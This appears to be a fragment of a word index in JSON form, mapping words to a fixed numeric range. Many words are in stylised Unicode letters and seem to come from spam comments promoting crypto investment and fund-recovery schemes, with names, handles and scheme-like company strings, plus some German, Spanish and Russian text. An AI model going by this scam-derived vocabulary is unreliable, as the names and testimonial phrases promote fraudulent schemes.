"\ud835\udc93\ud835\udc86\ud835\udc82\ud835\udc8d\ud835\udc8d\ud835\udc9a": [0, 65535], "\ud835\udc8c\ud835\udc8f\ud835\udc90\ud835\udc98": [0, 65535], "\ud835\udc89\ud835\udc90\ud835\udc98": [0, 65535], "\ud835\udc82\ud835\udc91\ud835\udc91\ud835\udc93\ud835\udc86\ud835\udc84\ud835\udc8a\ud835\udc82\ud835\udc95\ud835\udc86": [0, 65535], "\ud835\udc8e\ud835\udc96\ud835\udc84\ud835\udc89": [0, 65535], "\ud835\udc85\ud835\udc90\ud835\udc8f\ud835\udc86": [0, 65535], "\ud835\udc70'\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc8c\ud835\udc86\ud835\udc86\ud835\udc91": [0, 65535], "\ud835\udc95\ud835\udc86\ud835\udc8d\ud835\udc8d\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc91\ud835\udc86\ud835\udc90\ud835\udc91\ud835\udc8d\ud835\udc86": [0, 65535], "\ud835\udc9a\ud835\udc90\ud835\udc96\ud835\udc93": [0, 65535], "\ud835\udc88\ud835\udc90\ud835\udc90\ud835\udc85": [0, 65535], "\ud835\udc98\ud835\udc90\ud835\udc93\ud835\udc8c\ud835\udc94": [0, 65535], "\ud835\udc74\ud835\udc93": [0, 65535], "poul": [0, 65535], "louis": [0, 65535], "\ud835\udc82\ud835\udc93\ud835\udc86": [0, 65535], "\ud835\udc82\ud835\udc8f": [0, 65535], "\ud835\udc82\ud835\udc8f\ud835\udc88\ud835\udc86\ud835\udc8d": [0, 65535], "\ud835\udc90\ud835\udc8f": [0, 65535], "\ud835\udc6c\ud835\udc82\ud835\udc93\ud835\udc95\ud835\udc89": [0, 65535], "\ud835\udc91\ud835\udc93\ud835\udc82\ud835\udc9a": [0, 65535], "\ud835\udc6e\ud835\udc90\ud835\udc85": [0, 65535], "\ud835\udc84\ud835\udc90\ud835\udc8f\ud835\udc95\ud835\udc8a\ud835\udc8f\ud835\udc96\ud835\udc86\ud835\udc94": [0, 65535], "\ud835\udc83\ud835\udc8d\ud835\udc86\ud835\udc94\ud835\udc94": [0, 65535], "\ud835\udc91\ud835\udc8d\ud835\udc86\ud835\udc82\ud835\udc94\ud835\udc86": [0, 65535], "\ud835\udc8a\ud835\udc87": [0, 65535], "\ud835\udc9a\ud835\udc90\ud835\udc96'\ud835\udc93\ud835\udc86": [0, 65535], "\ud835\udc88\ud835\udc90\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc82\ud835\udc93\ud835\udc90\ud835\udc96\ud835\udc8f\ud835\udc85": [0, 65535], "\ud835\udc8d\ud835\udc90\ud835\udc90\ud835\udc8c\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc94\ud835\udc82\ud835\udc87\ud835\udc86": [0, 65535], "\ud835\udc91\ud835\udc8d\ud835\udc82\ud835\udc95\ud835\udc87\ud835\udc90\ud835\udc93\ud835\udc8e\ud835\udc94": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc97\ud835\udc86\ud835\udc94\ud835\udc95": [0, 65535], "\ud835\udc95\ud835\udc8a\ud835\udc8e\ud835\udc86": [0, 65535], "\ud835\udc8f\ud835\udc90\ud835\udc98": [0, 65535], "uwk": [0, 65535], "rabimmm": [0, 65535], "met": [0, 65535], "douglas": [0, 65535], "curtis": [0, 65535], "bzsleyaxwxi": [0, 65535], "\ud835\uddcd\ud835\uddc1\ud835\uddc2\ud835\uddcc": [0, 65535], "\ud835\uddbc\ud835\uddc8\ud835\uddc6\ud835\uddc9\ud835\uddba\ud835\uddc7\ud835\uddd2": [0, 65535], "\ud835\uddcc\ud835\uddba\ud835\uddcf\ud835\uddbe\ud835\uddbd": [0, 65535], "\ud835\uddbb\ud835\uddce\ud835\uddcc\ud835\uddc2\ud835\uddc7\ud835\uddbe\ud835\uddcc\ud835\uddcc": [0, 65535], "\ud835\uddc8\ud835\uddcf\ud835\uddbe\ud835\uddcb\ud835\uddbd\ud835\uddcb\ud835\uddba\ud835\uddbf\ud835\uddcd": [0, 65535], "\ud835\uddcd\ud835\uddc1\ud835\uddba\ud835\uddc7\ud835\uddc4": [0, 65535], "\ud835\uddd2\ud835\uddc8\ud835\uddce": [0, 65535], "kjk": [0, 65535], "yzzdnk": [0, 65535], "pwrj": [0, 65535], "prokrpjodq": [0, 65535], "accordance": [0, 65535], "georgia": [0, 65535], "martin": [0, 65535], "nmxlg": [0, 65535], "yx": [0, 65535], "zda": [0, 65535], "nitros": [0, 65535], "heute": [0, 65535], "wieder": [0, 65535], "ein": [0, 65535], "toller": [0, 65535], "entzug": [0, 65535], "nur": [0, 65535], "einer": [0, 65535], "investition": [0, 65535], "von": [0, 65535], "sch\u00e4tzen": [0, 65535], "sie": [0, 65535], "wirklich": [0, 65535], "mich": [0, 65535], "getan": [0, 65535], "haben": [0, 65535], "sind": [0, 65535], "der": [0, 65535], "beste": [0, 65535], "und": [0, 65535], "verspreche": [0, 65535], "arbeit": [0, 65535], "zu": [0, 65535], "verbreiten": [0, 65535], "danke": [0, 65535], "herr": [0, 65535], "k\u00f6nnen": [0, 65535], "ihn": [0, 65535], "unter": [0, 65535], "dem": [0, 65535], "folgenden": [0, 65535], "kontaktieren": [0, 65535], "leonsimon": [0, 65535], "zktmk": [0, 65535], "fjmmq": [0, 65535], "dearest": [0, 65535], "bellow": [0, 65535], "vitalyve": [0, 65535], "fellow": [0, 65535], "\u0441\u043f\u0430\u0441\u0438\u0431\u043e": [0, 65535], "\u0442\u0435\u0431\u0435": [0, 65535], "\u0431\u043e\u043b\u044c\u0448\u043e\u0435": [0, 65535], "\u0440\u0443\u0441\u043a\u043a\u0438\u0445": [0, 65535], "\u043f\u043e\u043a\u0443\u043f\u0430\u0442\u0435\u043b\u0435\u0439": [0, 65535], "\u043e\u0447\u0435\u043d\u044c": [0, 65535], "\u0446\u0435\u043d\u043d\u0430\u044f": [0, 65535], "\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": [0, 65535], "importantly": [0, 65535], "hrsnnfimah": [0, 65535], "jzwy": [0, 65535], "biesto": [0, 65535], "incre\u00edble": [0, 65535], "hice": [0, 65535], "retiro": [0, 65535], "exitoso": [0, 65535], "esta": [0, 65535], "haga": [0, 65535], "enlace": [0, 65535], "reg\u00edstrese": [0, 65535], "itvni": [0, 65535], "\ud835\udc08\ud835\udc27\ud835\udc2f\ud835\udc1e\ud835\udc2c\ud835\udc2d\ud835\udc26\ud835\udc1e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc20\ud835\udc28\ud835\udc2d": [0, 65535], "\ud835\udc29\ud835\udc2b\ud835\udc28\ud835\udc1f\ud835\udc22\ud835\udc2d": [0, 65535], "\ud835\udc23\ud835\udc2e\ud835\udc2c\ud835\udc2d": [0, 65535], "\ud835\udc2c\ud835\udc1e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc2d\ud835\udc28": [0, 65535], "\ud835\udc30\ud835\udc1a\ud835\udc25\ud835\udc25\ud835\udc1e\ud835\udc2d": [0, 65535], "\ud835\udc30\ud835\udc22\ud835\udc2d\ud835\udc21\ud835\udc28\ud835\udc2e\ud835\udc2d": [0, 65535], "\ud835\udc1a\ud835\udc27\ud835\udc32": [0, 65535], "\ud835\udc1d\ud835\udc28\ud835\udc2e\ud835\udc1b\ud835\udc2d": [0, 65535], "\ud835\udc1a\ud835\udc25\ud835\udc25": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1a\ud835\udc27\ud835\udc24\ud835\udc2c": [0, 65535], "\ud835\udc05\ud835\udc28\ud835\udc2b": [0, 65535], "shirleyfx": [0, 65535], "\ud835\udc8e\ud835\udc90\ud835\udc8f\ud835\udc95\ud835\udc89\ud835\udc94": [0, 65535], "\ud835\udc94\ud835\udc82\ud835\udc98": [0, 65535], "\ud835\udc85\ud835\udc8a\ud835\udc87\ud835\udc87\ud835\udc86\ud835\udc93\ud835\udc86\ud835\udc8f\ud835\udc95": [0, 65535], "\ud835\udc95\ud835\udc86\ud835\udc94\ud835\udc95\ud835\udc8a\ud835\udc8e\ud835\udc90\ud835\udc8f\ud835\udc8a\ud835\udc82\ud835\udc8d\ud835\udc94": [0, 65535], "\ud835\udc98\ud835\udc86\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc95\ud835\udc93\ud835\udc82\ud835\udc85\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc94\ud835\udc95\ud835\udc93\ud835\udc82\ud835\udc95\ud835\udc86\ud835\udc88\ud835\udc8a\ud835\udc86\ud835\udc94": [0, 65535], "\ud835\udc84\ud835\udc90\ud835\udc8f\ud835\udc87\ud835\udc8a\ud835\udc93\ud835\udc8e\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc98\ud835\udc8a\ud835\udc95\ud835\udc89\ud835\udc85\ud835\udc93\ud835\udc82\ud835\udc98\ud835\udc82\ud835\udc8d\ud835\udc94": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc85\ud835\udc86\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc97\ud835\udc86\ud835\udc93\ud835\udc9a": [0, 65535], "\ud835\udc94\ud835\udc8c\ud835\udc86\ud835\udc91\ud835\udc95\ud835\udc8a\ud835\udc84\ud835\udc82\ud835\udc8d": [0, 65535], "\ud835\udc82\ud835\udc85\ud835\udc97\ud835\udc86\ud835\udc93\ud835\udc95\ud835\udc8a\ud835\udc94\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc83\ud835\udc9a": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc86\ud835\udc94\ud835\udc86": [0, 65535], "\ud835\udc83\ud835\udc86\ud835\udc8f\ud835\udc86\ud835\udc87\ud835\udc8a\ud835\udc84\ud835\udc8a\ud835\udc82\ud835\udc93\ud835\udc8a\ud835\udc86\ud835\udc94": [0, 65535], "\ud835\udc84\ud835\udc90\ud835\udc8f\ud835\udc94\ud835\udc95\ud835\udc82\ud835\udc8f\ud835\udc95": [0, 65535], "\ud835\udc97\ud835\udc8a\ud835\udc84\ud835\udc95\ud835\udc8a\ud835\udc8e": [0, 65535], "\ud835\udc91\ud835\udc90\ud835\udc8f\ud835\udc9b\ud835\udc8a": [0, 65535], "\ud835\udc94\ud835\udc84\ud835\udc89\ud835\udc86\ud835\udc8e\ud835\udc86\ud835\udc94": [0, 65535], "\ud835\udc82\ud835\udc91\ud835\udc91": [0, 65535], "\ud835\udc82\ud835\udc8d\ud835\udc93\ud835\udc86\ud835\udc82\ud835\udc85\ud835\udc9a": [0, 65535], "\ud835\udc85\ud835\udc86\ud835\udc82\ud835\udc8d": [0, 65535], "\ud835\udc8f\ud835\udc90\ud835\udc95": [0, 65535], "\ud835\udc98\ud835\udc8a\ud835\udc8d\ud835\udc8d\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc87\ud835\udc82\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc6b\ud835\udc96\ud835\udc86": [0, 65535], "\ud835\udc87\ud835\udc86\ud835\udc82\ud835\udc93": [0, 65535], "\ud835\udc85\ud835\udc90\ud835\udc96\ud835\udc83\ud835\udc95": [0, 65535], "\ud835\udc8a\ud835\udc95": [0, 65535], "\ud835\udc95\ud835\udc90\ud835\udc90\ud835\udc8c": [0, 65535], "\ud835\udc98\ud835\udc86\ud835\udc86\ud835\udc8c\ud835\udc94": [0, 65535], "\ud835\udc83\ud835\udc86\ud835\udc87\ud835\udc90\ud835\udc93\ud835\udc86": [0, 65535], "\ud835\udc82\ud835\udc84\ud835\udc95\ud835\udc96\ud835\udc82\ud835\udc8d\ud835\udc8d\ud835\udc9a": [0, 65535], "\ud835\udc95\ud835\udc82\ud835\udc8c\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc95\ud835\udc90": [0, 65535], "\ud835\udc84\ud835\udc90\ud835\udc8f\ud835\udc94\ud835\udc8a\ud835\udc85\ud835\udc86\ud835\udc93\ud835\udc82\ud835\udc95\ud835\udc8a\ud835\udc90\ud835\udc8f": [0, 65535], "\ud835\udc98\ud835\udc8a\ud835\udc95\ud835\udc89": [0, 65535], "shirley": [0, 65535], "\ud835\udc85\ud835\udc86\ud835\udc84\ud835\udc8a\ud835\udc85\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc89\ud835\udc8a\ud835\udc8e": [0, 65535], "\ud835\udc95\ud835\udc93\ud835\udc9a": [0, 65535], "\ud835\udc94\ud835\udc86\ud835\udc86": [0, 65535], "\ud835\udc8d\ud835\udc86\ud835\udc88\ud835\udc8a\ud835\udc95\ud835\udc8a\ud835\udc8e\ud835\udc82\ud835\udc95\ud835\udc86": [0, 65535], "\ud835\udc89\ud835\udc86": [0, 65535], "\ud835\udc95\ud835\udc93\ud835\udc8a\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc90\ud835\udc96\ud835\udc95": [0, 65535], "clipped": [0, 65535], "mario": [0, 65535], "johnson": [0, 65535], "lxdm": [0, 65535], "rpwidkmtq": [0, 65535], "villa": [0, 65535], "licensed": [0, 65535], "yckrdjth": [0, 65535], "qjupxp": [0, 65535], "ynje": [0, 65535], "doubts": [0, 65535], "miniature": [0, 65535], "joincht": [0, 65535], "hjbmnbitcoinstrading": [0, 65535], "ikbvqmtiqe": [0, 65535], "jmwe": [0, 65535], "buene": [0, 65535], "tardes": [0, 65535], "permanent": [0, 65535], "rewards": [0, 65535], "agents": [0, 65535], "tutoring": [0, 65535], "fk": [0, 65535], "exb": [0, 65535], "\u1d1b\u0280\u1d00\u1d05\u026a\u0274\u0262": [0, 65535], "\u026a\u0274": [0, 65535], "\u1d05\u1d00\u028f\ua731": [0, 65535], "\u1d21\u1d00\ua731": [0, 65535], "\u1d04\u0280\u1d07\u1d05\u026a\u1d1b\u1d07\u1d05": [0, 65535], "\u1d07x\u1d04\u029f\u1d1c\u1d05\u026a\u0274\u0262": [0, 65535], "\u1d1b\u029c\u1d00\u1d1b": [0, 65535], "\ua731": [0, 65535], "\u1d1b\u026a\u1d0d\u1d07\ua731": [0, 65535], "\u026a\u0274\u026a\u1d1b\u026a\u1d00\u029f": [0, 65535], "\u1d04\u1d00\u1d18\u026a\u1d1b\u1d00\u029f": [0, 65535], "\ua731\u1d1b\u1d00\u0280\u1d1b": [0, 65535], "\u1d1c\u1d18": [0, 65535], "\u026a\u1d0d\u1d00\u0262\u026a\u0274\u1d07": [0, 65535], "\u029c\u1d0f\u1d21": [0, 65535], "\u1d0d\u1d1c\u1d04\u029c": [0, 65535], "\u028f\u1d0f\u1d1c": [0, 65535], "\u1d04\u1d0f\u1d1c\u029f\u1d05": [0, 65535], "\u1d0d\u1d00\u1d0b\u1d07": [0, 65535], "\u029c\u026a\u0262\u029c\u1d07\u0280": [0, 65535], "\ua731\u1d07\u1d1b": [0, 65535], "manuel": [0, 65535], "\u1d05\u026a\u1d05": [0, 65535], "\ua730\u1d0f\u0280": [0, 65535], "\u1d0d\u1d07": [0, 65535], "rtaxbdxmiwztfh": [0, 65535], "educator": [0, 65535], "brandonholden": [0, 65535], "wx": [0, 65535], "upr": [0, 65535], "nkxytg": [0, 65535], "blessings": [0, 65535], "pmtmwkpy": [0, 65535], "deeds": [0, 65535], "dxq": [0, 65535], "umkg": [0, 65535], "lnjhk": [0, 65535], "hashflarecompany": [0, 65535], "paycheck": [0, 65535], "carelessly": [0, 65535], "awqcawbmmhawmopmdhhhttp": [0, 65535], "ricco": [0, 65535], "davis": [0, 65535], "bringing": [0, 65535], "happiness": [0, 65535], "nagy": [0, 65535], "aexyphhadallm": [0, 65535], "organisation": [0, 65535], "economy": [0, 65535], "zsxe": [0, 65535], "blessing": [0, 65535], "patrickfx": [0, 65535], "deceived": [0, 65535], "assured": [0, 65535], "boast": [0, 65535], "iq": [0, 65535], "wealth": [0, 65535], "stephanie": [0, 65535], "luis": [0, 65535], "brixinvestment": [0, 65535], "kohzrwg": [0, 65535], "everlasting": [0, 65535], "ckb": [0, 65535], "zkhkzwe": [0, 65535], "hutchinson": [0, 65535], "mentor": [0, 65535], "bevobucis": [0, 65535], "mwnk": [0, 65535], "\ud835\udc08'\ud835\udc97\ud835\udc86": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc90\ud835\udc96\ud835\udc94\ud835\udc82\ud835\udc8f\ud835\udc85": [0, 65535], "\ud835\udc85\ud835\udc90\ud835\udc8d\ud835\udc8d\ud835\udc82\ud835\udc93\ud835\udc94": [0, 65535], "\ud835\udc82\ud835\udc94": [0, 65535], "\ud835\udc83\ud835\udc86\ud835\udc88\ud835\udc8a\ud835\udc8f\ud835\udc8f\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc83\ud835\udc8a\ud835\udc8f\ud835\udc82\ud835\udc93\ud835\udc9a": [0, 65535], "\ud835\udc90\ud835\udc91\ud835\udc95\ud835\udc8a\ud835\udc90\ud835\udc8f": [0, 65535], "\ud835\udc82\ud835\udc8d\ud835\udc94\ud835\udc90": [0, 65535], "\ud835\udc8e\ud835\udc86\ud835\udc95": [0, 65535], "\ud835\udc94\ud835\udc84\ud835\udc82\ud835\udc8e\ud835\udc8e\ud835\udc86\ud835\udc93\ud835\udc94": [0, 65535], "\ud835\udc98\ud835\udc89\ud835\udc90\ud835\udc94": [0, 65535], "\ud835\udc82\ud835\udc94\ud835\udc8c\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc91\ud835\udc82\ud835\udc9a": [0, 65535], "\ud835\udc87\ud835\udc86\ud835\udc86": [0, 65535], "\ud835\udc90\ud835\udc93": [0, 65535], "\ud835\udc90\ud835\udc95\ud835\udc89\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc83\ud835\udc96\ud835\udc95": [0, 65535], "\ud835\udc94\ud835\udc95\ud835\udc8a\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc88\ud835\udc86\ud835\udc95": [0, 65535], "\ud835\udc91\ud835\udc93\ud835\udc90\ud835\udc87\ud835\udc8a\ud835\udc95": [0, 65535], "\ud835\udc7c\ud835\udc8f\ud835\udc95\ud835\udc8a\ud835\udc8d": [0, 65535], "\ud835\udc94\ud835\udc8a\ud835\udc94\ud835\udc95\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc95\ud835\udc86\ud835\udc90\ud835\udc85\ud835\udc96\ud835\udc84\ud835\udc86": [0, 65535], "\ud835\udc6a\ud835\udc93\ud835\udc9a\ud835\udc91\ud835\udc95\ud835\udc90\ud835\udc88\ud835\udc90\ud835\udc8d\ud835\udc85\ud835\udc86\ud835\udc8f\ud835\udc87\ud835\udc99": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc86\ud835\udc9a": [0, 65535], "\ud835\udc95\ud835\udc93\ud835\udc96\ud835\udc94\ud835\udc95\ud835\udc98\ud835\udc90\ud835\udc95\ud835\udc89\ud835\udc9a": [0, 65535], "\ud835\udc87\ud835\udc86\ud835\udc82\ud835\udc93\ud835\udc8a\ud835\udc8f\ud835\udc88": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc86\ud835\udc8a\ud835\udc93": [0, 65535], "\ud835\udc98\ud835\udc90\ud835\udc93\ud835\udc85\ud835\udc94": [0, 65535], "\ud835\udc7b\ud835\udc89\ud835\udc86\ud835\udc9a": [0, 65535], "\ud835\udc89\ud835\udc86\ud835\udc8d\ud835\udc91\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc93\ud835\udc86\ud835\udc84\ud835\udc90\ud835\udc97\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc8d\ud835\udc90\ud835\udc94\ud835\udc86\ud835\udc94": [0, 65535], "\ud835\udc7d\ud835\udc70\ud835\udc77": [0, 65535], "\ud835\udc95\ud835\udc89\ud835\udc90\ud835\udc96\ud835\udc88\ud835\udc89\ud835\udc95": [0, 65535], "\ud835\udc8d\ud835\udc86\ud835\udc84\ud835\udc95\ud835\udc96\ud835\udc93\ud835\udc86": [0, 65535], "\ud835\udc95\ud835\udc93\ud835\udc82\ud835\udc85\ud835\udc86": [0, 65535], "\ud835\udc86\ud835\udc82\ud835\udc93\ud835\udc8f": [0, 65535], "\ud835\udc8e\ud835\udc9a\ud835\udc94\ud835\udc86\ud835\udc8d\ud835\udc87": [0, 65535], "veqnbv": [0, 65535], "rjntq": [0, 65535], "clayton": [0, 65535], "williams": [0, 65535], "dy": [0, 65535], "tabb": [0, 65535], "bmmjnk": [0, 65535], "mrkianlucas": [0, 65535], "baa": [0, 65535], "zwjk": [0, 65535], "procrastinating": [0, 65535], "bold": [0, 65535], "dean": [0, 65535], "krause": [0, 65535], "bsihyvnblgs": [0, 65535], "ndhk": [0, 65535], "\ud835\udc30\ud835\udc1a\ud835\udc2c": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc1f\ud835\udc1e\ud835\udc2b\ud835\udc2b\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc1f\ud835\udc2b\ud835\udc22\ud835\udc1e\ud835\udc27\ud835\udc1d": [0, 65535], "\ud835\udc28\ud835\udc27\ud835\udc25\ud835\udc22\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc2c\ud835\udc1c\ud835\udc1a\ud835\udc26": [0, 65535], "\ud835\udc1c\ud835\udc28\ud835\udc26\ud835\udc29\ud835\udc1a\ud835\udc27\ud835\udc32": [0, 65535], "\ud835\udc1b\ud835\udc2e\ud835\udc2d": [0, 65535], "\ud835\udc26\ud835\udc28\ud835\udc2f\ud835\udc1e\ud835\udc1d": [0, 65535], "bitcoinhourlycompany": [0, 65535], "wmn": [0, 65535], "highest": [0, 65535], "financing": [0, 65535], "bonuses": [0, 65535], "discriminate": [0, 65535], "turbulent": [0, 65535], "sincerity": [0, 65535], "hzzshowzjlgwztq": [0, 65535], "bittrading": [0, 65535], "zokkgbc": [0, 65535], "jamess": [0, 65535], "hywsg": [0, 65535], "sziz": [0, 65535], "mgfk": [0, 65535], "zqkb": [0, 65535], "invests": [0, 65535], "customer": [0, 65535], "amelia": [0, 65535], "joseph": [0, 65535], "ameliajoseph": [0, 65535], "czbyfg": [0, 65535], "hedxingm": [0, 65535], "unbelievable": [0, 65535], "bitcryptofinance": [0, 65535], "ma'am": [0, 65535], "hour's": [0, 65535], "vitoriatrader": [0, 65535], "wh\u043e": [0, 65535], "discoerd": [0, 65535], "zemc": [0, 65535], "bvqzc": [0, 65535], "amoarmzwe": [0, 65535], "\ud835\udc22": [0, 65535], "\ud835\udc2c\ud835\udc28": [0, 65535], "\ud835\udc20\ud835\udc2b\ud835\udc1e\ud835\udc1a\ud835\udc2d": [0, 65535], "\ud835\udc28\ud835\udc29\ud835\udc29\ud835\udc28\ud835\udc2b\ud835\udc2d\ud835\udc2e\ud835\udc27\ud835\udc22\ud835\udc2d\ud835\udc32": [0, 65535], "\ud835\udc29\ud835\udc2b\ud835\udc28\ud835\udc1f\ud835\udc22\ud835\udc25\ud835\udc1e": [0, 65535], "\ud835\udc1a\ud835\udc20\ud835\udc1a\ud835\udc22\ud835\udc27": [0, 65535], "\ud835\udc26\ud835\udc2b": [0, 65535], "\ud835\udc27\ud835\udc28\ud835\udc1a\ud835\udc21": [0, 65535], "msbzdlegoz": [0, 65535], "xnza": [0, 65535], "delivering": [0, 65535], "stipulated": [0, 65535], "denispatrick": [0, 65535], "qgr": [0, 65535], "yjda": [0, 65535], "zje": [0, 65535], "koin": [0, 65535], "stocks": [0, 65535], "treasury": [0, 65535], "benjamintracyty": [0, 65535], "\ud835\udc1a\ud835\udc1f\ud835\udc2d\ud835\udc1e\ud835\udc2b": [0, 65535], "\ud835\udc2c\ud835\udc1e\ud835\udc2f\ud835\udc1e\ud835\udc27": [0, 65535], "\ud835\udc1d\ud835\udc1a\ud835\udc32\ud835\udc2c": [0, 65535], "\ud835\udc0e\ud835\udc1f": [0, 65535], "\ud835\udc2d\ud835\udc2b\ud835\udc1a\ud835\udc1d\ud835\udc1e\ud835\udc2c": [0, 65535], "\ud835\udc29\ud835\udc28\ud835\udc2c\ud835\udc2c\ud835\udc22\ud835\udc1b\ud835\udc25\ud835\udc1e": [0, 65535], "\ud835\udc26\ud835\udc1a\ud835\udc32": [0, 65535], "\ud835\udc06\ud835\udc28\ud835\udc1d": [0, 65535], "\ud835\udc1b\ud835\udc25\ud835\udc1e\ud835\udc2c\ud835\udc2c": [0, 65535], "\ud835\udc20\ud835\udc28\ud835\udc28\ud835\udc1d": [0, 65535], "\ud835\udc30\ud835\udc28\ud835\udc2b\ud835\udc24": [0, 65535], "\ud835\udc1d\ud835\udc28\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc26\ud835\udc1e": [0, 65535], "fy": [0, 65535], "zdo": [0, 65535], "yza": [0, 65535], "monzo": [0, 65535], "profitbitmining": [0, 65535], "benjamintracyat": [0, 65535], "stories": [0, 65535], "lmprde": [0, 65535], "mjk": [0, 65535], "pending": [0, 65535], "zjbevn": [0, 65535], "ky": [0, 65535], "zjbh": [0, 65535], "anna": [0, 65535], "john": [0, 65535], "basics": [0, 65535], "richard": [0, 65535], "wilson's": [0, 65535], "hggy": [0, 65535], "jcbk": [0, 65535], "imta": [0, 65535], "wilsonxf": [0, 65535], "xkiqukmr": [0, 65535], "ywm": [0, 65535], "\u0432\u0434\u0440\u0443\u0433": [0, 65535], "\u043f\u043e\u0434\u0435\u0432\u0430\u043b\u0438\u0441\u044c": [0, 65535], "\u0432\u0441\u0435": [0, 65535], "\u0442\u043e\u043b\u043f\u044b": [0, 65535], "\u0446\u0438\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445": [0, 65535], "\u0447\u0435\u0440\u0447\u0438\u043b\u043b\u044f": [0, 65535], "\u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435": [0, 65535], "\u0441\u0432\u0438\u043d\u043e\u0444\u0435\u0440\u043c\u044b": [0, 65535], "\u0446\u0438\u0442\u0430\u0442\u044b": [0, 65535], "\u043e\u0431\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c": [0, 65535], "\u0438\u0441\u0447\u0435\u0437\u043b\u0438": [0, 65535], "\u043d\u0435\u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e": [0, 65535], "\u043e": [0, 65535], "\u0441\u0430\u043c\u043e\u043c": [0, 65535], "\u0447\u0435\u0440\u0447\u0438\u043b\u043b\u0435": [0, 65535], "\u043e\u043d\u0438": [0, 65535], "\u0437\u043d\u0430\u0442\u044c": [0, 65535], "\u043d\u0438\u0447\u0435\u0433\u043e": [0, 65535], "\u0437\u043d\u0430\u043b\u0438": [0, 65535], "\u0438\u043c": [0, 65535], "\u0443\u0434\u043e\u0431\u043d\u044b\u043c": [0, 65535], "\u043d\u0430\u0431\u043e\u0440\u043e\u043c": [0, 65535], "\u0441\u043b\u043e\u0432": [0, 65535], "\u0441\u043b\u0443\u0436\u0438\u043b": [0, 65535], "\u043f\u0440\u043e\u0441\u0442\u043e": [0, 65535], "\u0435\u0441\u0442\u044c": [0, 65535], "\u043d\u0435\u0432\u0435\u0440\u043e\u044f\u0442\u043d\u0430\u044f": [0, 65535], "\u043a\u043d\u0438\u0433\u0430": [0, 65535], "\u043d\u043e\u0432\u0430\u044f": [0, 65535], "\u0446\u0438\u0442\u0430\u0442": [0, 65535], "\u043f\u0440\u043e": [0, 65535], "\u0430\u043d\u0433\u043b\u0438\u0447\u0430\u043d\u0435": [0, 65535], "\u043f\u0440\u043e\u0436\u0438\u043b\u0438": [0, 65535], "\u0433\u043e\u0434": [0, 65535], "\u043f\u043e\u0434": [0, 65535], "\u0431\u043e\u043c\u0431\u0430\u043c\u0438": [0, 65535], "\u043a\u043b\u0435\u043f\u0430\u043b\u0438": [0, 65535], "\u0441\u0430\u043c\u043e\u043b\u0451\u0442\u044b": [0, 65535], "\u0431\u043e\u044f\u043b\u0438\u0441\u044c": [0, 65535], "\u0434\u043e": [0, 65535], "\u0443\u0436\u0430\u0441\u0430": [0, 65535], "\u0443\u0431\u0438\u0432\u0430\u043b\u0438": [0, 65535], "\u044d\u0442\u043e\u0442": [0, 65535], "\u0443\u0436\u0430\u0441": [0, 65535], "\u0431\u0430\u043d\u0430\u043b\u044c\u043d\u044b\u043c\u0438": [0, 65535], "\u0431\u044b\u0442\u043e\u0432\u044b\u043c\u0438": [0, 65535], "\u0432\u0435\u0449\u0430\u043c\u0438": [0, 65535], "\u0447\u0435\u0440\u0447\u0438\u043b\u043b\u044c": [0, 65535], "\u0443\u043c\u043e\u043b\u044f\u043b": [0, 65535], "\u0430\u043c\u0435\u0440\u0438\u043a\u0443": [0, 65535], "\u043d\u0435\u0451": [0, 65535], "\u0442\u0430\u043a\u0438": [0, 65535], "\u0434\u043e\u0441\u0442\u0443\u0447\u0430\u043b\u0441\u044f": [0, 65535], "\u0442\u0443\u043f\u043e": [0, 65535], "\u0434\u0435\u043d\u0435\u0433": [0, 65535], "\u043f\u0440\u0438\u0432\u044b\u0447\u043a\u0438": [0, 65535], "\u043e\u0441\u0442\u0430\u043b\u0438\u0441\u044c": [0, 65535], "\u043a\u043e\u043d\u0446\u0435": [0, 65535], "\u043a\u043e\u043d\u0446\u043e\u0432": [0, 65535], "\u0442\u0440\u0430\u0445\u043d\u0443\u043b\u0438": [0, 65535], "\u0435\u0433\u043e": [0, 65535], "\u043d\u0435\u0432\u0435\u0441\u0442\u043a\u0443": [0, 65535], "\u0431\u043e\u043b\u0435\u0435": [0, 65535], 